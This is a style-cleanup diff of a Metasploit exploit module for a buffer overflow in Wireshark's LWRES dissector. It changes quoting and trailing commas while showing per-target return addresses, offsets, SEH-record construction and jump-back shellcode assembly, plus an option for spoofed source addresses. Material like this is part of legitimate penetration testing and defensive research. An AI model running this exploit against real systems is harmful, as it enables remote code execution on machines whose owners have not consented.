@@ -48,16 +48,15 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h' ]
         ],
         'DefaultOptions' => {
-          'EXITFUNC' => 'process',
+          'EXITFUNC' => 'process'
         },
         'Privileged'	=> true, # at least capture privilege
         'Payload' => {
           'Space' => 512,
           'BadChars' => "\x00",
-          'DisableNops' => true,
+          'DisableNops' => true
         },
         'DefaultTarget'	=> 4,
-        'Platform' => %w{linux osx win},
         'Targets' => [
           [
             'tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)',
@@ -100,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_X64,
               'Platform' => 'linux',
               'Ret' => 0xfeedfed5deadbeef,
-              'RetOff' => 152,
+              'RetOff' => 152
             }
           ],
 
@@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_X86,
               'Platform' => 'osx',
               'Ret' => 0xdeadbeef,
-              'RetOff' => 268,
+              'RetOff' => 268
             }
           ],
 
@@ -126,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
               # 0x02A110B6 = pop/pop/ret in libgtk-w
               # 0x03D710CC = pop/mov/pop/ret in packet
               # 0x61B4121B = pop/pop/ret in pcre3
-              'RetOff' => 2128,
+              'RetOff' => 2128
             }
           ],
         ],
@@ -143,13 +142,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       Opt::RPORT(921),
-      Opt::RHOST("239.255.255.250"),
+      Opt::RHOST('239.255.255.250'),
       OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),
       OptInt.new('DELAY', [true, 'This option sets the delay between sent packets', 5])
     ])
 
     register_advanced_options([
-      OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ])
+      OptBool.new('ExitOnSession', [ false, 'Return from the exploit after a session has been created', true ])
     ])
 
     deregister_options('FILTER', 'PCAPFILE')
@@ -171,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
       str << rand_text(4)
       # ret is next
     elsif (target == targets[1])
-      fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-3500").encode_string
+      fix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, 'add esp,-3500').encode_string
       str = make_nops(ret_offset - fix_esp.length - payload.encoded.length)
       str << fix_esp
       str << payload.encoded
@@ -179,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
       str << [target.ret].pack('V')
       # jump back
       distance = ret_offset + 4
-      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
+      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, 'jmp $-' + distance.to_s).encode_string
     elsif (target == targets[4])
       # ugh, /GS and UDP length issues :-/
       str = make_nops(ret_offset - payload.encoded.length)
@@ -187,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
       str << generate_seh_record(target.ret)
       # jump back
       distance = ret_offset + 8
-      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
+      str << Metasm::Shellcode.assemble(Metasm::Ia32.new, 'jmp $-' + distance.to_s).encode_string
     else
       # this is just a simple DoS payload
       str = Rex::Text.pattern_create(ret_offset)
